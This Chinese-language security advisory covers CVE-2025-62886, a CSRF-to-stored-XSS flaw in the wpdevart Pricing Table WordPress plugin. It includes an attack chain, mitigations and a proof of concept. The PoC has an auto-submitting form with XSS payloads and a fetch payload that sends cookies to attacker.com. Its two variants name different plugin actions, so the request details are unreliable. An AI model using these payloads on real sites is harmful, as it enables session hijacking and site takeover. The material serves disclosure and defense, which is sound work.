CVE-2025-62886: wpdevart Pricing Table插件CSRF漏洞导致存储型XSS

漏洞信息

漏洞编号

CVE-2025-62886

漏洞类型

CSRF/存储型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

wpdevart Pricing Table builder (WordPress插件)

漏洞概述

CVE-2025-62886是WordPress插件wpdevart Pricing Table builder中的一个高危安全漏洞，CVSS评分达到7.1分。该漏洞属于跨站请求伪造（CSRF）类型，攻击者利用此漏洞可以实现存储型跨站脚本攻击（Stored XSS）。漏洞影响范围为插件1.5.3及以下所有版本。攻击者可以构造恶意请求，诱使已登录的管理员用户在不知情的情况下执行操作，从而在网站的Pricing Table中注入恶意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端，所有访问包含该定价表的页面用户都会受到攻击影响，可能导致会话劫持、凭据窃取、恶意重定向等严重后果。此漏洞由Patchstack安全团队发现并报告，披露日期为2025年10月27日。

技术细节

该漏洞的根本原因在于wpdevart Pricing Table插件缺少对关键操作（如创建、编辑定价表）的CSRF令牌验证。攻击者可以构造一个恶意HTML页面，包含自动提交的表单，该表单模拟管理员对插件设置的操作请求。由于服务器端未验证请求的来源合法性（缺少anti-CSRF token），攻击者能够以已认证管理员的身份执行任意操作。攻击者通常会在表单中注入包含<script>标签或事件处理器（如onerror、onload）的JavaScript代码。当管理员访问攻击者构造的页面时，浏览器会自动提交表单到目标WordPress站点。服务器接收请求后，由于存在XSS过滤不足，恶意脚本代码会被保存到数据库中。当其他用户访问包含该定价表的页面时，存储的恶意脚本会在其浏览器中执行，窃取Cookies、会话令牌或进行其他恶意操作。攻击的成功关键在于利用社会工程学技术诱骗管理员点击恶意链接。

攻击链分析

STEP 1

1

攻击者创建恶意HTML页面，包含自动提交的CSRF表单或JavaScript代码

STEP 2

2

攻击者通过社会工程学手段（如钓鱼邮件、恶意链接）诱骗WordPress管理员访问该恶意页面

STEP 3

3

受害者浏览器自动向目标WordPress站点发送包含恶意XSS payload的请求，由于管理员已登录，请求携带有效会话cookie

STEP 4

4

服务器端wpdevart Pricing Table插件接收请求，因缺少CSRF验证，请求被成功处理

STEP 5

5

恶意XSS payload（如<img src=x onerror=...>或<script>标签）被保存到数据库中，作为定价表内容的一部分

STEP 6

6

当其他用户访问包含该定价表的页面时，存储的恶意脚本在用户浏览器中执行，窃取cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-62886: wpdevart Pricing Table Stored XSS -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2025-62886</title>
</head>
<body>
    <h1>CSRF PoC for wpdevart Pricing Table</h1>
    <p>This page will automatically submit a CSRF attack to inject stored XSS.</p>
    
    <form action="http://target-wordpress-site/wp-admin/admin-post.php" method="POST" id="csrfForm">
        <input type="hidden" name="action" value="save_pricing_table">
        <input type="hidden" name="table_id" value="1">
        <input type="hidden" name="table_name" value="<img src=x onerror='alert(document.cookie)'>Malicious Table">
        <input type="hidden" name="table_data" value='{"price":"<script>alert(String.fromCharCode(88,83,83))</script>"}'>
        <input type="hidden" name="security_nonce" value="">
    </form>
    
    <script>
        // Auto-submit form when page loads
        document.getElementById('csrfForm').submit();
    </script>
    
    <p>If you see this message, the form has been submitted.</p>
</body>
</html>

<!-- Alternative PoC using fetch API -->
<script>
// Fetch-based CSRF attack for CVE-2025-62886
fetch('http://target-wordpress-site/wp-admin/admin-ajax.php', {
    method: 'POST',
    credentials: 'include',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: 'action=wpdevart_pricing_table_save&table_title=<img src=x onerror=fetch(`https://attacker.com/steal?c=\`+document.cookie+\``)>'
});
</script>

影响范围

wpdevart Pricing Table builder <= 1.5.3

防御指南

临时缓解措施

如果无法立即升级插件，可以采取以下临时缓解措施：1) 临时禁用wpdevart Pricing Table插件；2) 使用Web应用防火墙（WAF）规则阻止可疑请求；3) 限制管理员账户的使用，仅在必要时登录；4) 启用WordPress的双因素认证增强管理员账户安全；5) 监控服务器日志和WordPress审计日志，关注异常的admin-post.php或admin-ajax.php请求。建议尽快应用官方发布的安全更新。